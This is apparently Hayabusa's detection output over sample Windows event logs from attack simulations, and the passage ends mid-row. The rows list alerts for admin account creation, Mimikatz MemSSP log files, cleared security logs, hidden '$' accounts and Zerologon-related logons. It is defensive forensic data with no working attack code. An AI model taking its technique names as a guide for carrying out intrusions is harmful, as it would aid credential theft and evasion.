00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:00:24.602 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:00:24.602 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:02:16.084 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-05 13:28:40.585 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3004 -s 632 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 3424 | PGUID: 747F3D96-9288-5F53-1902-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:33:34.590 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 3668 -s 4420 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog | LID: 0x3e5 | PID: 4688 | PGUID: 747F3D96-93AE-5F53-3602-00000000E500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:34:11.983 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x4 /state0:0xa3cea855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 6556 | PGUID: 747F3D96-93D3-5F53-3802-00000000E500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-05 13:37:07.245 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x2 /state0:0xa3bd2855 /state1:0x41c64e6d | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1008 | PGUID: 747F3D96-130C-5F54-1300-00000000E600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_EventLog_Service_Crashed.evtx +2020-09-09 13:18:23.627 +00:00,MSEDGEWIN10,4625,low,,Logon Failure - Wrong Password,User: IEUser | Type: 2 | Computer: MSEDGEWIN10 | IP Addr: - | AuthPackage: Negotiate,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_4624_4625_LogonType2_LogonProc_chrome.evtx +2020-09-10 17:48:47.077 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\windows\system32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 388 | PGUID: 747F3D96-66F7-5F5A-0500-00000000F600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-10 17:48:47.077 +00:00,MSEDGEWIN10,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_smss_child_proc_bootexecute_setupexecute.evtx +2020-09-11 12:10:22.398 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 640 | PGUID: 747F3D96-672C-5F5B-0D00-00000000FC00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-11 12:10:22.398 +00:00,MSEDGEWIN10,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_win_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_Mimikatz_Memssp_Default_Logs_Sysmon_11.evtx +2020-09-14 14:44:04.878 +00:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:44:14.393 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:46:33.690 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-14 14:48:28.683 +00:00,Sec504Student,4674,medium,Persis,Possible Hidden Service Attempt,Svc: nginx | User: Sec504 | LID: 0x99e3d | AccessMask: %%1539,rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/DeepBlueCLI/eventlog-dac.evtx +2020-09-15 18:04:36.333 +00:00,MSEDGEWIN10,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-15 18:04:39.987 +00:00,MSEDGEWIN10,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: svc01 | Target User: IEUser | IP Address: - | Process: C:\Windows\System32\inetsrv\w3wp.exe | Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Runas_4624_4648_Webshell_CreateProcessAsUserA.evtx +2020-09-15 19:28:17.594 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-15 19:28:31.453 +00:00,01566s-win16-ir.threebeesco.com,104,high,Evas,System Log File Cleared,User: a-jbrown,rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_CVE-2020-1472_DFIR_System_NetLogon_Error_EventID_5805.evtx +2020-09-15 19:29:51.507 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff6e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-15 19:29:51.517 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x31ff89,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Zerologon_VoidSec_CVE-2020-1472_4626_LT3_Anonym_follwedby_4742_DC_Anony_DC.evtx +2020-09-16 09:31:19.133 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107103,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:31:19.133 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:32:13.647 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: $ | SID: S-1-5-21-308926384-506822093-3341789130-107104,rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-16 09:32:13.647 +00:00,01566s-win16-ir.threebeesco.com,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_Fake_ComputerAccount_4720.evtx +2020-09-17 10:57:37.013 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 10:57:44.254 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-17 10:57:44.270 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: 02694W-WIN10 | IP Addr: 172.16.66.37 | LID: 0x853237,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +2020-09-19 21:12:15.920 +00:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:12:15.920 +00:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:14:32.852 +00:00,01566s-win16-ir.threebeesco.com,12,medium,,Registry Key Create/Delete_Sysmon Alert,Machine Account Saved Password Set | CreateKey: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-19 21:14:32.852 +00:00,01566s-win16-ir.threebeesco.com,13,medium,,Registry Key Value Set_Sysmon Alert,Machine Account Saved Password Set | SetValue: HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC\CurrVal\(Default): Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 584 | PGUID: 83989F29-0ADD-5F61-0B00-00000000FE00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon13_MachineAccount_Password_Hash_Changed_via_LsarSetSecret.evtx +2020-09-20 21:22:24.799 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Local Admin Password Setting Changed | SetValue: HKLM\SAM\SAM\Domains\Account\Users\000001F4\ForcePasswordReset: Binary Data | Process: C:\Windows\system32\lsass.exe | PID: 648 | PGUID: 747F3D96-C6C1-5F67-0000-0010A65D0000,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Sysmon_13_Local_Admin_Password_Changed.evtx +2020-09-23 16:49:26.469 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52246 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:49:41.578 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:49:44.353 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{DC4537C3-CA73-4AC7-9E1D-B2CE27C3A7A6} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 3276 | PGUID: 83989F29-7CA8-5F6B-1201-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:49:44.380 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{49F6E667-6658-4BD1-9DE9-6AF87F9FAF85} | Process: C:\Windows\System32\dllhost.exe | User: 3B\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x7b186 | PID: 7096 | PGUID: 83989F29-7CA8-5F6B-1301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:16.697 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.697 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1136e95,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.702 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:16.703 +00:00,01566s-win16-ir.threebeesco.com,18,medium,,Pipe Connected_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:16.892 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\WerFault.exe -u -p 5424 -s 4616 | Process: C:\Windows\System32\WerFault.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted | LID: 0x3e5 | PID: 6868 | PGUID: 83989F29-7CC8-5F6B-2101-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:17.194 +00:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:17.194 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: - | IP Addr: 172.16.66.37 | LID: 0x1137987,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:17.200 +00:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_suspicious_remote_eventlog_svc_access_5145.evtx +2020-09-23 16:50:18.302 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50106 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:18.302 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.37:50107 (-) | Dst: 172.16.66.36:445 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 83989F29-3374-5F6B-0100-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:19.821 +00:00,01566s-win16-ir.threebeesco.com,1,info,,Process Created,Cmd: C:\Windows\system32\wermgr.exe -upload | Process: C:\Windows\System32\wermgr.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 4248 | PGUID: 83989F29-7CCB-5F6B-2301-000000000301,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:27.599 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52249 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:50:45.506 +00:00,01566s-win16-ir.threebeesco.com,17,medium,,Pipe Created_Sysmon Alert,PrivEsc - Rogue Spool named pipe | Pipe: \eventlog | Process: C:\Windows\System32\svchost.exe | PID: 6924 | PGUID: 83989F29-7CC9-5F6B-2201-000000000301,rules/hayabusa/sysmon/alerts/17_PipeCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-23 16:51:27.552 +00:00,01566s-win16-ir.threebeesco.com,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:52264 (01566s-win16-ir.threebeesco.com) | Dst: 0:0:0:0:0:0:0:1:389 (01566s-win16-ir.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | PID: 1864 | PGUID: 83989F29-3391-5F6B-1F00-000000000301,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_remote_eventlog_svc_crash_byt3bl33d3r_sysmon_17_1_3.evtx +2020-09-27 13:19:54.244 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.250 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.257 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.264 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.272 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\atsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.286 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\epmapper | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.293 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\eventlog | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.299 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\InitShutdown | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.314 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.322 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.328 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.343 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx +2020-09-27 13:19:54.350 +00:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 